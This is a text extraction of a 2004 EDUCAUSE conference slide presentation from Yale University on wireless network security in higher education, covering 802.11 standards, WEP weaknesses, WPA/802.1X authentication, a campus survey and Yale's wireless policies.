Transcript Effective Practices in Wireless Security for Higher

Effective Practices
Working Group
EDUCAUSE 2004 Annual Conference
Wednesday Oct 20, 2004, 2:15p-3:05p - Track 3 Session
Meeting Room 605 - Denver Colorado Convention Center
Effective Practices in Wireless
Security for Higher Ed
H. Morrow Long, CISSP, CISM
Director - Information Security
Yale University
Copyright Notice
Effective Practices
Working Group
Copyright H. Morrow Long 2004. This work is the
intellectual property of the author. Permission is
granted for this material to be shared for noncommercial, educational purposes, provided that
this copyright statement appears on the
reproduced materials and notice is given that
the copying is by permission of the author. To
disseminate otherwise or to republish requires
written permission from the author.
The Problem?
Effective Practices
Working Group
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
Yahoo Map! Of Yale
Effective Practices
Working Group
QuickTime™ and a
None decompressor
are needed to see this picture.
Effective Practices
Working Group
Yale Central & Science
Campus Wireless Map
http://www.wifimaps.com/
Effective Practices
Working Group
QuickTime™ and a
TIFF (Uncompressed) decompressor
are needed to see this picture.
Effective Practices
Working Group
Yale Medical Campus
Wireless Map
Effective Practices
Working Group
http://www.intel.com/ca/personal/do_m
ore/wireless/stories/bondar.htm
With more than 50 speaking engagements a year
throughout North America and a career as a photographer
that takes her around the world, Bondar, who was chosen
to participate in the prestigious Women of Influence
speakers series, carries her notebook PC, equipped with
Intel® Centrino™ mobile technology+, everywhere she
goes. On a recent visit to Yale University in Connecticut,
Bondar says, "I used it on hospital rounds with
neurosurgery residents." This is not your father's
notebook, distinguished solely by portability. The built-in
wireless technology allows unprecedented freedom.+
Among its attributes are mobility, of course, enhanced by a
thin profile and lightweight components, longer battery life
and uncompromised performance. A user within range of a
wireless local area network (WLAN), or hotspot, has
immediate high-speed access to the Internet and e-mail
and can download or send text, data and graphics with
ease. "Even five years ago," says Bondar, "wireless
technology would have made a huge difference to my life."
Quick Time™ and a
TIFF (Uncompressed) dec ompressor
are needed to s ee this pic ture.
Effective Practices
Working Group
•
•
•
•
•
•
•
VPN
Supranet
Internet
internet
intranet
extranet
ISP
WLAN Network Security
Terminology Definitions
•
•
•
•
•
•
Firewall
WEP
SSL / TLS
Access Point
NAT Router
Bridge
•
•
•
•
•
Encryption
Authentication
PKI
LDAP
“Certificate”
Effective Practices
Working Group
•
•
•
•
•
•
•
•
•
Wireless Data –
Terminology Definition
IEEE 802.11a
IEEE 802.11b
IEEE 802.1x
IEEE 802.11e
IEEE 802.11g
IEEE 802.11i
Bluetooth
HomeRF
Jini
•
•
•
•
•
•
•
EAP
LEAP
PEAP
EAP over TLS
TTLS
WiFi
WPA
Effective Practices
Working Group
802.11 Wireless
Standards
802.11 – 1 to 2 megabits/second.
802.11b – From 1 up to 11 megabits/second.
• Conflicts with frequency band used by Bluetooth.
802.11a supports data rates of 6 Mbps, 12 Mbps and 24
Mbps, 36 Mbps, 48 Mbps and 54 Mbps.
802.11e – multimedia & QoS improvements, security?
802.11g – 22Mbps and up to 54Mbps
802.1x - Auth. & port access ctl for all 802 LANs
WPA – 802.1X + EAP + TKIP + MIC
802.11i – WPA plus AES (Advanced Enc. Std)
Effective Practices
Working Group
802.11 Generic MAC
layer - IBSS
IBSS (Independent Basic Service Set) AKA “Ad-hoc” network.
Stations associate directly with each other
without an AP.
No relaying, only direct (peer to peer).
Effective Practices
Working Group
802.11 Generic MAC
layer - BSS
BSS (Basic Service Set) - AP plus stations
AKA “Infrastructure” network.
Stations need AP to communicate w/each
other and/or to relay packets out to internet.
SSID may be broadcast via beacon frames.
“Association” Request sent by client station to
AP. Handshake to set up association may
involve authentication.
“Disassociate” Request may be sent at end of
session (or may not be sent at all if station
shuts down or moves out of range).
Effective Practices
Working Group
802.11 Generic MAC
layer - ESS
ESS (Extended Service Set) - Multiple APs
(each with multiple stations) connected (via
wireless or wired LAN).
AKA Extended “Infrastructure” network.
ESS == Set of BSSs connected via a
distribution system (DS). Shared SSID.
Aps communicate among themselves.
Entire WLAN is a single MAC layer 2 net.
Station mobility within ESS. AP handoff.
802.11 PHY Specs
Effective Practices
Working Group
802.11 PHY
Max Data Rate
Frequency
802.11
2Mb/s
2.4Ghz &IR FHSS/DSSS
802.11b
11Mb/s
2.4Ghz
DSSS
802.11g
22-54Mb/s
2.4Ghz
OFDM
Super-G
108Mb/s
2.4Ghz
OFDM
802.11a
54Mb/s
5Ghz
OFDM
Modulation
Effective Practices
Working Group
802.11b (WECA ->
WiFi)
Most popular wireless LAN (WLAN).
11 Separate Channels in 2.4Ghz -overlapping bands of frequencies.
Channels 1, 6 and 11 are commonly
used as this allows three nonoverlapping channels.
Effective Practices
Working Group
802.11b (WECA ->
WiFi) & g
Most popular wireless LAN (WLAN).
11 Separate Channels in 2.4Ghz -overlapping bands of frequencies.
Channels 1, 6 and 11 are commonly
used as this allows three nonoverlapping channels.
802.11a
Effective Practices
Working Group
Less popular wireless LAN (WLAN).
8 Non-overlapping Channels in the
5Ghz frequency range.
Was the only 54Mb/s WLAN until
802.11g -- which using compatible h/w,
APs and frequency range.
Wireless Data Risks and Threats – What
are we worried about?
Effective Practices
Working Group
Controlling Access to our Network
 Preventing intruders and disallowing anonymous access.
 Identifying and authenticating “trusted” users and devices.
 Authorization and network access control
Confidentiality
 Preventing eavesdropping and decryption to ensure privacy.
Integrity
 Preventing tampering and session hijacking.
Availability
 Ensuring quality of service, preventing denial of service.
Effective Practices
Working Group
Wireless Security
Problems
Default Passwords
Open Broadcast of SSIDs
No or weak encryption.
Lack of authentication.
Accidental & Malicious association w/rogue APs
(M-I-T-M tampering possible).
Sniffing
Spoofing
Denial of Service (DoS) Attacks
Attacks from outside: Spammers & Worms
Effective Practices
Working Group
Default SSID (Service
Set Identifier)
Cisco
‘tsunami’
Linksys Aps ‘linksys’
Sent in beacon frames
Effective Practices
Working Group
Wireless Security
Problems
Network Attacks (Spoofing and Denial of Service (DoS)
Attacks) -- Layers 1 thru 3.
Layer 1: Malicious AP overpowering a valid AP
Layer 2: Spanning Tree packet (802.1D) attacks.
Broadcasts causing loops in redundant LANs.
Layer 2: Attacks on EAP endpoints (spoofed
start/logoff commands, bogus connect/failure msgs)
Layer 3: ARP Cache Poisoning.
Sending spoofed unsolicited ARP replies to computers
to have them divert packets.
Effective Practices
Working Group
SSID Security
Guidelines
Change the SSID from the vendor
default.
Do not set the SSID to a secret (e.g. a
password in use elsewhere) nor to
anything which provides information to
outsiders (e.g. company name).
Configure AP settings to not broadcast
the SSID in beacon frames.
Effective Practices
Working Group
WLAN Security
Guidelines
Use WEP to deter casual eavesdropping &
trespassing.
Use a VLAN & private IP subnet range
outside of the corporate intranet.
Firewall the WLAN from the corporate
intranet.
Require and use VPNs from stations to enter
the corporate intranet.
Effective Practices
Working Group
802.11b Wireless
Security Flaws
• Confidentiality - Interception / drive-by snooping
• WEP – Wired Equiv Privacy
• VPNs and App Level Crypto (SSL/TLS, SSH)
• Integrity - Impersonation
• ARP cache poisoning (spoofing wired/wireless)
• Session Hijacking
• Availability - Denial of service (DoS)
• Easy to jam with broad spectrum interference
• Some protection against electric appliances
Effective Practices
Working Group
802.11b Wireless
Security Flaws
• Authentication
• MAC/Hardware Address Control
• DHCP using registered MAC/HW addresses
• Firewall plus VPN approach
• Proprietary
• Cisco Aironet 350, Cisco driver and RADIUS
• Web-based authentication
• Authorization - Appropriate Access Control
• Access Point filters, NAT routers and Firewalls
• Accounting
- Public 802.11b ISPs! Credit Cards.
Effective Practices
Working Group
802.11b Wireless
Security Flaws
802.11b has been criticized by UC Berkeley ISAAC
group researchers as flawed:
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
At least one public domain program now is available
on the Internet which will sniff WEP traffic and
brute force reverse engineer the static key which is
being used for encryption. Therefore WEP by itself
is no longer considered secure to protect 802.11b
traffic.
Effective Practices
Working Group
802.11b Wireless
Security Flaws
802.11b Access Points and networks were
demonstrated as vulnerable to ARP cache poisoning
by Cigital, Inc. in September 2001.
• Wireless PCs can be impersonated/traffic redirected.
• SSH and SSL sessions can be hijacked.
• Wired hosts can be impersonated and have their
traffic redirected if the access point is attached to a
wired LAN.
• Other wireless LANs attached to the same wired
LAN are also susceptible to ARP cache poisoning.
Effective Practices
Working Group
802.11b Wireless
Security Flaws
Denial of Service
802.11b bandwidth degrades as single strength
decreases (from 11mb to 1mb in increments).
802.11b frequency band conflicts with Bluetooth,
wireless microphones, microwave ovens, etc.
802.11b supports multiple channels – can be used for
noise/conflict avoidance, but not really useful for
security (by obscurity).
Signal can be boosted at PC end by adding an antenna.
Amplifying signal reception at the AP increases noise.
Effective Practices
Working Group
802.11b Wireless
Security Flaws
Denial of Service
Yesterday’s CCA flaw/vulnerability in 802.11b.
See the CERT announcement and
http://www.computerworld.com/securitytopics/security/story/0,10801,93221p4,00.htm
Effective Practices
Working Group
802.11b + 801.X
Wireless Security Flaws
University of Maryland researchers:
Arbaugh and Misra
Possible weaknesses:
• Session hijacking
• Man in the Middle (MitM) attacks
Effective Practices
Working Group
802.11b Confidentiality
Solutions
WEP - To secure 802.11b using WEP (Wireless
Equivalent Privacy) you need to (most sites don’t
do these):
• Lock down MAC (physical Ethernet) addresses
• Set a network name (non-blank & non-guessable).
• Configure a static shared secret (or set of secrets).
• Change frequently.
• Purchase 64 or 128 bit cards & base units.
Non-WEP – Use appl. Level cryptography (SSL, etc.)
• Use and/or require VPNs
Effective Practices
Working Group
802.11b Integrity
Solutions: Best Practices
Network Access Control
(Protect against ARP cache poisoning)
Don’t connect Wireless Access Points to the wired network
Put Wireless Access Points outside corporate firewall
Firewalling/filtering/blocking WLANs
Use NAT Router / Firewall Wireless Access Points
Use VLANs between wired and wireless networks
Use of Wireless VLANs to segregate
Effective Practices
Working Group
802.11b Availability
Solutions
Note that wireless networks are susceptible to DoS attacks and
have very limited shared bandwidth
-- THEREFORE THEY ARE NOT SUITABLE
REPLACEMENTS FOR A WIRED NETWORK when you need
high reliability (e.g. Patient or animal subject RT monitoring).
That said, they can be a useful part of a BCP, Disaster Recovery
strategy (Sept. 11, 2001 WTC cases) in the event of a wired
network failure, for Internet access.
Suitable shielding may protect internal 802.11b nets.
Intentional jamming may prevent 802.11b use…put outside
external shielding.
Don’t use omni-directional antennas to decrease the spread of
signal, area of reception – particularly on P2P links.
802.11b Authentication / Authorization /
Accounting Solutions
Effective Practices
Working Group
Use of VPNs over Wireless LANs
 Virtual Private Networks – PPTP, L2TP, IPSEC
 Username / Password, Hardware tokens, X.509 certificates.
Proprietary
 Secure Authentication Enhancements
• Cisco Aironet 350 enhances WEP with RADIUS user
authentication vs MAC address. Adds infinite number of WEP keys (vs.
one –Apple-- or four -- Lucent).
 Secure Web based authentication approaches
802.1X “Provides”
Effective Practices
Working Group
• Authentication (various methods)
• Port based access control
• NOT confidentiality (uses WEP)
• Can provide dynamic WEP key mgt
• (CISCO uses EAP to provide this)
Effective Practices
Working Group
802.11b + 802.1X
“Fixes”
• Add MAC (Message Auth Check) to EAP and
802.11b mgt msgs
• Time sync communications between PC and Aps
Effective Practices
Working Group
WPA (WiFi Protected
Access)
Forward compatible with IEEE 802.11i
draft standard (except 802.11i adds AES
encryption).
EAP (Extensible Access Protocol)
TKIP (Temporal Key Integrity Protocol)
MIC (Message Integrity Check)
802.1X (for auth and dynamic key
exchange
WPA Operation
Effective Practices
Working Group
WPA will provide a TKIP encryption key to
both PC and AP to provide secure
session.
In absence of an authentication server
(e.g. a home or small office network) WPA
will use PREShared key mode (manual
fixed password/key)
Legacy operation (old gear).
Requirements for WPA
Effective Practices
Working Group
WPA AP w/TKIP & 802.1X
WPA Client w/TKIP, 802.1X & EAP
“supplicant” supporting auth
method/server
Authentication server on network (e.g.
RADIUS) w/strong EAP:
• TLS
• TTLS
• PEAP/LEAP
Effective Practices
Working Group
Comparison of WEP &
WPA
WEP
 40 bit static keys manually distributed
 Flawed or no authentication
WPA
 128 bit dynamic keys automatically distributed w/ per
user/session/packet keys
 802.1X and EAP authentication
WPA2
 WPA2 is WPA plus AES (Advanced Encryption
Standard). It is 802.11i compliant.
Effective Practices
Working Group
Proprietary Wireless
Security
Lucent (Orinoco) - Created first features:
1. “closed network” - Don’t broadcast SSID
(e.g. turn of AP broadcast ‘beacon frames’).
2. 128 bit WEP (WEP Plus - 40bits -> 104bits)
WEB key crack from days to 20 weeks
(but other WEP flaws bring time to 0)
Effective Practices
Working Group
Proprietary Wireless
Security
CISCO (340/350/…) - features:
Dynamically Generated Short-lived (Broadcast) WEP
keys
(in an early firmware release)
Effective Practices
Working Group
Non-Proprietary
Wireless Security
MAC Address Filtering
Description:
Register Physical Addresses of authorized devices
Flaws:
1. Must be registered in list in AP or in a server (e.g.
special RADIUS server).
2. Physical Addresses can easily be spoofed.
Effective Practices
Working Group
Non-Proprietary
Wireless Security
VPN (with or without filtering/blocking of non-VPN traffic)
Description:
Tunnel all wireless traffic through VPN sessions.
Require VPN connection to a specific VPN server.
Provides CIA (Confidentiality, Integrity & Auth).
VPN (PPTP, L2TP, IPSEC) choice.
Potential Flaws:
1.
Redundant encryption (if also using WEP).
2.
Bandwidth hog / latency problem.
Effective Practices
Working Group
Non-Proprietary
Wireless Security
802.1X -- Extensible Authentication Protocol
Designed for wired AND wireless LANs.
Can filter or enable ports and/or MAC
addresses on switches and APs.
Not a cipher.
Not a single authentication method:






EAP-MD5
EAP-Cisco Wireless (aka LEAP)
EAP-TLS (Microsoft, RFC2716)
EAP-TTLS
PEAP (Microsoft and Cisco)
EAP-SIM proposal (use GSM SIM cards)
Effective Practices
Working Group
Non-Proprietary
Wireless Security
802.1X -- EAP Authentication
“bucket”
EAP-MD5
Description:
MD5 Hashing of user/pass creds
-- pass to RADIUS
Flaws:
No key mgt
-- uses static WEP keys.
Effective Practices
Working Group
Non-Proprietary
Wireless Security
802.1X -- EAP Authentication “bucket”
EAP-CISCO WIRELESS (LEAP)
Description:
Username/ password credentials
-- passed to RADIUS
Benefits
generates one-time WEP keys for each session
can use RADIUS timeout features to nullify current WEP attacks,
prevents rogue AP association attacks(by mutual auth requirement)
Flaws or Drawbacks:
Needs special 802.11b driver to support LEAP
Effective Practices
Working Group
Non-Proprietary
Wireless Security
802.1X -- EAP Authentication “bucket”
EAP-TLS (Microsoft, RFC2716)
Description:
uses X.509 certs for auth,
uses SSL/TLS to pass the PKI info
Benefits
generates one-time WEP keys for each session ala LEAP.
Flaws or Drawbacks:
Needs special 802.11b driver (clients).
 special clients are available for some Linux distros and all non-CE Windows).
Drawback -- requires a PKI & certs.

Microsoft Certificate Server and AD LDAP server can be used in an Active Directory
Environment.
Effective Practices
Working Group
Non-Proprietary
Wireless Security
802.1X -- EAP Authentication “bucket”
PEAP (Microsoft and Cisco)
Description:
Similar to EAP-TLS but uses username/password rather than certs.
uses SSL/TLS to pass the credentials
Benefits
generates one-time WEP keys for each session ala LEAP.
PKI and user certificate is not required.
Flaws or Drawbacks:
Needs special 802.11b driver (clients).
 special clients are available -- particularly for Windows XP SP1.
Effective Practices
Working Group
Proprietary Wireless
Security Systems
Aruba
BlueSocket
Ecutel
ReefEdge
Vernier
Survey
Which WLAN security modes are you using (check all
Effective Practices
Working
Group apply):
that
1. None
2. MAC Address Filtering
3. Application Level (SSL)
4. VPN
5. Proprietary
EAP Modes:
6. WEP
A. EAP-MD5
7. WPA
B. LEAP (Cisco)
8. 802.1x
9. 802.11i
C. EAP-TLS (Microsoft, RFC2716)
10. EAP
D. PEAP (Microsoft, Cisco)
E. Other EAP (EAP-SIM, TTLS)
Effective Practices
Working Group
# of Respondents with
WiFi Access?
16
14
12
10
8
6
4
2
0
Yes
No
Effective Practices
Working Group
Publish Campus WiFi
Information on Web?
10
8
6
4
No
Yes
2
0
Yes
No
SSID?
Hotspot
Map?
9
6
10
5
Campus WLAN Mode
Effective Practices
Working Group
15
10
5
0
IBSS
BSS
ESS
1
12
4
Effective Practices
Working Group
# WiFi WLAN Standards
implemented
15
10
5
0
Yes
No
No
Yes
802.11a
802.11b
802.11g
Super-G
4
12
15
1
7
8
0
15
Effective Practices
Working Group
WiFi Encryption /
Authentication Modes
15
10
No
5
0
Yes
No
Yes
WEP
WPA
802.1X
10
5
1
14
7
8
Effective Practices
Working Group
801.X Authentication
Protocols Implemented
16
14
12
10
Yes
No
8
6
4
2
0
EAPMD5
LEAP
(Cisco)
PEAP
EAP-TLS
TTLS
Effective Practices
Working Group
Commercial Secure WiFi
Vendor Implementations
15
10
5
0
Implemented
No
Evaluating
BlueSock Perfigo
et
Eval
None
1
13
1
Effective Practices
Working Group
WLAN / Campus Network
Topology Independence
12
10
8
6
4
2
0
Yes
No
WLAN
VLAN
12
3
Private
Non- Campus
IP
campus Public
5
10
6
9
9
6
Effective Practices
Working Group
Net Sec Access Control
--Firewall between WLAN &
12
10
8
6
Yes
No
Not Yet
4
2
0
Yes
No
Not Yet
Campus Net
Internet
4
11
0
8
6
1
VPN Session Required
from WLAN to connect to:
Effective Practices
Working Group
12
10
8
6
4
2
0
Yes
No
Not Yet
Outside of
WLAN
Campus
Net
2
12
1
3
12
0
Yes
No
Not Yet
Effective Practices
Working Group
WLAN Data Link Layer
Security Protections
15
10
5
0
Yes
No
Not Yet
MAC
ACLs
6
9
0
Anti Private No ID
Spoof SSID Bcast
2
13
0
3
12
0
5
9
1
Effective Practices
Working Group
WLAN Security CounterMeasures
15
10
5
0
Yes
No
Force WAP
Associations
Jamming
Capability
5
10
0
15
WLAN Authentication 1
Effective Practices
Working Group
15
10
5
0
Yes
No
Not Yet
Allow NetRe Web 802.1X
Unauth gDHCP Logon Logon
1
14
0
8
7
0
6
9
0
6
8
1
WLAN Authentication 2
Effective Practices
Working Group
2
1.5
1
0.5
0
Yes
X.509 Certs
SmartCard
VPN Auth
1
0
2
WEP/WPA Encryption
Effective Practices
Working Group
WPA 128 & 802.1X
WPA 128 Static
Not Yet
No
Yes
WEP > 64 Dynamic
WEP 40 Dynamic
WEP > 64 Static
WEP 40 Static
0
5
10
15
20
Effective Practices
Working Group
Encryption Requirement
by WLAN Protocol Layer
8
6
4
2
0
Don't Care
Recommend
Require
Applica
Transp Networ
Session
tion
ort
k
5
6
2
4
6
3
5
2
5
5
2
5
Data
Link
5
2
5
WLAN Policies 1
Effective Practices
Working Group
8
6
4
2
0
Yes
No
N/A
RF Airspace
Reserved
Require Non-IT
WAP Stds
8
7
0
6
7
2
Effective Practices
Working Group
WLAN Policies 2 - Allow
WLANs outside IT?
12
10
8
6
4
2
0
Yes
No
Non-IT
Dept WAPs
Faculty
WAPs
Student
WAPs
5
10
4
11
3
12
Effective Practices
Working Group
Interesting or Unique
Practices and Findings
Not all devices support > 64 bit WEP so 40 bit
must often be used.
A few campuses are moving from Cisco LEAP to
PEAP or EAP-TLS.
Rutgers is using BlueSocket:
http://ruwireless.rutgers.edu/
Dartmouth has widespread WiFi and VoIP over
WiFi.
Several campuses use NoCat for both wired and
wireless authentication (and thereby enable
access).
Effective Practices
Working Group
More Interesting/Unique
Practices and Findings
Companies are marketing for-pay public
WiFi access points which you can hang off
of any high speed Internet connection.
These boxes allow users passing by to
associate and pay for access by credit
card. Look for students to try to make
$$$?
Effective Practices
Working Group
Other Interesting/Unique
Practices and Findings?
Effective Practices
Working Group
Yale University Unwritten Wireless Policy
Do no harm: Private Wireless Access Points which
cause network disruption at Yale will be removed
from the network (this includes causing interference
by overlapping RF channels, etc). Use of WEP or
WPA is encouraged.
Private Access Points should not use the Yale SSID.
WiFi users are encouraged to use the VPN to
access critical apps or sensitive information.
Yale Administrative users should not use WiFi to
replace wired LAN connections.
The above admin apps should already however be
using application level security on wired networks.
Effective Practices
Working Group
Yale School of Medicine
Wireless Policy Points
All private WAPS need to be registered.
The default SSID must be changed to
something other than Yale’s and the
default passwords must be changed.
The WAP must only allow WEP and
should implement MAC address filtering.
It should be turned off if/when not used.
Effective Practices
Working Group
Yale School of Medicine
Wireless Policy Points
Official YSM WiFi Security :
ePHI should not be transferred unencrypted.
YSM ITS WLANs are changing from VPN (either
PPTP or IPSEC) recommended to required.
DHCP will vend a RFC1918 private IIP to the
YSM WLAN. Users must authenticate to the
VPN and use it to connect to any resources
outside of the WLAN.
Clients w/o registered MAC addresses or valid
VPN sessions attempting HTTP connections to
Addresses outside the WLAN VLAN are redirected
to a web portal where documentation and
software are available (but little else).
Wireless Data Risks and Threats –
What are we worried about?
Effective Practices
Working Group
Controlling Access to our Network
 Preventing intruders and disallowing anonymous access.
 Identifying and authenticating “trusted” users and devices.
 Authorization and network access control
Confidentiality
 Preventing eavesdropping and decryption to ensure privacy.
Integrity
 Preventing tampering and session hijacking.
Availability
 Ensuring quality of service, preventing denial of service.
Effective Practices
Working Group
Wireless Security
Problems
Default Passwords
Open Broadcast of SSIDs
No or weak encryption.
Lack of authentication.
Accidental & Malicious association w/rogue APs (M-I-T-M
tampering possible).
Sniffing
Spoofing
Denial of Service (DoS) Attacks (Dis-association,
Jamming)
Attacks from outside: Spammers & Worms
Effective Practices
Working Group
Wireless Security
Problems
Network Attacks (Spoofing and Denial of Service (DoS)
Attacks) -- Layers 1 thru 3.
Layer 1: Malicious AP overpowering a valid AP
Layer 2: Spanning Tree packet (802.1D) attacks.
Broadcasts causing loops in redundant LANs.
Layer 2: Attacks on EAP endpoints (spoofed start/logoff
commands, bogus connect/failure msgs)
Layer 3: ARP Cache Poisoning.
Sending spoofed unsolicited ARP replies to computers to
have them divert packets.
WiFi Security Pre-WPA/802.11i
Guidelines for Enterprise IT
Effective Practices
Working Group
Disable SSID broadcasts & use non-obvious SSID
Use WEP.
Use a separate VLAN & private IP net for WLAN.
Firewall WLAN off from the corporate intranet.
Require of use VPN to enter the corporate intranet.
Use MAC Address filtering -- block nonregistered
Force client association -- to known SSID
Monitor airspace -- war-walk/chalk/drive/run AND look into
WiFi perimeter protection products and systems.
Use 802.1X Layer 2 Authentication with EAP & RADIUS
Effective Practices
Working Group
WPA (WiFi Protected
Access)
Forward compatible with IEEE 802.11i
draft standard (except 802.11i adds AES
encryption).
EAP (Extensible Access Protocol)
TKIP (Temporal Key Integrity Protocol)
MIC (Message Integrity Check)
802.1X (for auth and dynamic key
exchange
Effective Practices
Working Group
What WPA and 802.11i
Provide:
Strong integrity.
Strong encryption
 Particularly AES vs. WEP encryption
implementation
 Dynamic Key Generation/Re-generation
Strong authentication capability
(w/802.1X/EAP).
Increased DoS (Denial of Service) protection
- particularly against Dis-association attacks
What is WPA2?
Effective Practices
Working Group
WPA2 == 802.11i
WPA2 & 802.11i include AES
WPA2 is basically (WPA + AES).
WPA does not and it uses TKIP. WPA IS secure.
AES meets FIPS 140-2 (req’d by some Gov’t
agencies).
AES can require new hardware or hardware
upgrades as it can require a new dedicated crypto
chip.
Several WiFi vendors are now ‘WPA2” compliant:
Conclusions
Effective Practices
Working Group
Few using WEP, some are now starting to
evaluate WPA (and wait for 802.11i).
Some use of commercial solutions
(Vernier, Aruba, some ReefEdge and
BlueSocket)?
Some interest is beginning in ‘network
admissions’ (require both authentication
and a network scan ala UCONN NetReg
mods) programs for both wired and
wireless LANs:Cisco, Perfigo, StillSecure
and Bradford Campus Manager.
Questions
Effective Practices
Working Group